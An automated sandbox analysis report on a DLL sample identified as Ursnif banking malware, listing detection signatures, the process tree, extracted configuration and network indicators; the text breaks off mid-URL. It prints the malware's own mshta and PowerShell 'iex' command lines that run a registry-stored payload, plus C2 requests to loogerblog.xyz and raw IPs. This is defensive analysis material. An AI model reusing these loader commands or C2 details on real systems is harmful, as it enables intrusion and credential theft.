
Analysis Report 5fd885c499439tar.dll

Overview

General Information

Sample Name: 5fd885c499439tar.dll
Analysis ID: 330591
MD5: dde0277221cabab1df0e1cccf6a125b2
SHA1: a7d375672ae47f087185c78a444487aa656c8eb5
SHA256: 0fb4779661fe23fdcd79c77fc74e721b637b496abe2eb26da28d12055af7b458
Tags: dll, gozi, isfb, ursnif

Most interesting Screenshot: (screenshot image omitted)

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a COM Internet Explorer object
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
PE file has a writeable .text section
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to get notified if a device is plugged in / out
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 5880 cmdline: loaddll32.exe 'C:\Users\user\Desktop\5fd885c499439tar.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)
    • regsvr32.exe (PID: 4540 cmdline: regsvr32.exe /s C:\Users\user\Desktop\5fd885c499439tar.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 5548 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
        • rundll32.exe (PID: 4724 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 340 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 948 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • cmd.exe (PID: 4532 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • iexplore.exe (PID: 5720 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
        • iexplore.exe (PID: 6492 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6844 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:82952 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 4696 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:82966 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6716 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:17432 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 5952 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:17436 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 2436 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6712 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1360 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6804 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3A14.tmp' 'c:\Users\user\AppData\Local\Temp\40soah3l\CSC95BB5FC1CC074173A3B7FF0DF3A65D4.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6172 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kpzypqek\kpzypqek.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5288 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4B0B.tmp' 'c:\Users\user\AppData\Local\Temp\kpzypqek\CSCCCB2EFB1A41F4F449A32549AFB48267C.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 5760 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\E443.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "12", "whoami": "user@424505hh", "dns": "424505", "version": "250167", "uptime": "185", "crc": "2", "id": "4343", "user": "ef15d01308f8d2d8cdc8873a31eb82f6", "soft": "3"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.532393287.0000000003130000.00000040.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.346665065.0000000005928000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.346762135.0000000005928000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(5 of 21 entries shown)

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process started, Author: Joe Security, Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6712, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline', ProcessId: 1360
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started, Author: Michael Haag, Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2436, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ProcessId: 6712
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6712, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline', ProcessId: 1360
Sigma detected: Suspicious Rundll32 Activity
Source: Process started, Author: juju4, Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 5548, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 4724

Signature Overview

AV Detection:

Found malware configuration
Source: regsvr32.exe.4540.1.memstr, Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@424505hh", "dns": "424505", "version": "250167", "uptime": "185", "crc": "2", "id": "4343", "user": "ef15d01308f8d2d8cdc8873a31eb82f6", "soft": "3"}
Multi AV Scanner detection for submitted file
Source: 5fd885c499439tar.dll, Virustotal: Detection: 18%
Source: 5fd885c499439tar.dll, ReversingLabs: Detection: 17%
Machine Learning detection for sample
Source: 5fd885c499439tar.dll, Joe Sandbox ML: detected
Source: C:\Windows\explorer.exe, Code function: 30_2_04E0174C RegisterDeviceNotificationA,30_2_04E0174C
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 1_2_04FA32BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_04FA32BA
Source: C:\Windows\explorer.exe, Code function: 30_2_04DEA85C FindFirstFileW,DeleteFileW,FindNextFileW,30_2_04DEA85C
Source: C:\Windows\explorer.exe, Code function: 30_2_04DF0C34 FindFirstFileW,30_2_04DF0C34
Source: C:\Windows\explorer.exe, Code function: 30_2_04E00180 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,30_2_04E00180
Source: C:\Windows\System32\RuntimeBroker.exe, File opened: C:\Users\user\AppData
Source: C:\Windows\System32\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\RuntimeBroker.exe, File opened: C:\Users\user
Source: C:\Windows\System32\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState
Source: C:\Windows\System32\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Packages
Source: C:\Windows\System32\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046} (3 times)
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Found Tor onion address
Source: powershell.exe, 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, control.exe, 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmp, String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: Joe Sandbox View, IP Address: 151.101.1.44
Source: Joe Sandbox View, IP Address: 172.217.22.66
Source: Joe Sandbox View, JA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
Source: Joe Sandbox View, JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: Joe Sandbox View, JA3 fingerprint: 7dd50e112cd23734a310b90f6f44a7cd
Source: unknown, TCP traffic detected without corresponding DNS query: 89.44.9.160 (3 times)
Source: unknown, TCP traffic detected without corresponding DNS query: 185.156.172.54 (18 times)
Source: global traffic, HTTP traffic detected: GET /images/NIcuL5NVjxwM/2GiryhKI5_2/FNJaA9fYIAvcIp/w_2B_2BISN4Xz1NACkLBL/pkU7CWqAnACS3mfT/L8UY8eM5OH2UEUf/YkINfq3G1re2fm3O_2/Bm50wSCja/z2jV3OYUZHUlZjtC6nrq/EjBj_2BKXD5RuU2KuhV/Cl0uV3h6LO61AkcuYZIVPE/IwiDB_2Fh5ocS/vj9JcGyf/6k71ht.avi HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: loogerblog.xyz | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: loogerblog.xyz | Connection: Keep-Alive | Cookie: PHPSESSID=jk7j02809o01qf4vm1q8i24ab4; lang=en
Source: global traffic, HTTP traffic detected: GET /images/mbvAWlXhGgjVcTCfFjQ/3O2AqJHvXl_2F3rHmST_2F/JBzJ8PgEHj9az/YhLHOgEV/FDnk_2BI6y_2FNZ1SYC0DHX/yz_2FidSfI/ISjXdHdSruWXI8x4L/I9bnuo4yasJ3/EeDt6cIikbB/1cEqD7MX_2Frsy/QkskFGS9_2BRFwpkzEev_/2FdOjUmi3y2iP97w/gNY3W1_2FvHzBhL/aaNiZHe0/y.avi HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: loogerblog.xyz | Connection: Keep-Alive | Cookie: lang=en; PHPSESSID=jk7j02809o01qf4vm1q8i24ab4
Source: global traffic, HTTP traffic detected: GET /images/heS41tWM4/dTuObjanXSKYXyb0FkTo/Sul08DWWYjtvEXiZbeu/IttDYgTEILEomnfMBe_2F9/LlGO2SSA0NV0T/hSQO_2BH/cC6AH5VKEVWx8JPacUwAYFJ/hgtk8WIB3K/d_2BdLS2yTOt6Dg4V/0VLl0wtt1zqh/gtyvfsYSOv2/OI80MTVkGXkXTK/hTK1aCHhr3hGK_2B_2Bhy/9cV8P8A2W8lNQ3ZP/mR3nBi4b/B.avi HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: loogerblog.xyz | Connection: Keep-Alive | Cookie: lang=en; PHPSESSID=jk7j02809o01qf4vm1q8i24ab4
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001E.00000000.499070200.0000000008430000.00000004.00000001.sdmp, String found in binary or memory: :2020121520201216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365 equals www.hotmail.com (Hotmail)
Source: explorer.exe, 0000001E.00000000.499070200.0000000008430000.00000004.00000001.sdmp, String found in binary or memory: :2020121520201216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 3656 equals www.hotmail.com (Hotmail)
Source: unknown, DNS traffic detected: queries for: www.msn.com
Source: explorer.exe, 0000001E.00000000.496563368.00000000075A0000.00000002.00000001.sdmp, String found in binary or memory: http://%s.com
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.496563368.00000000075A0000.00000002.00000001.sdmp, String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp, String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: powershell.exe, 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, control.exe, 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmp, String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, control.exe, 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmp, String found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: powershell.exe, 00000017.00000003.520930888.0000028A7B721000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: WerFault.exe, 00000025.00000003.525110655.0000000004E24000.00000004.00000001.sdmpString found in binary or memory: http://crl.micro
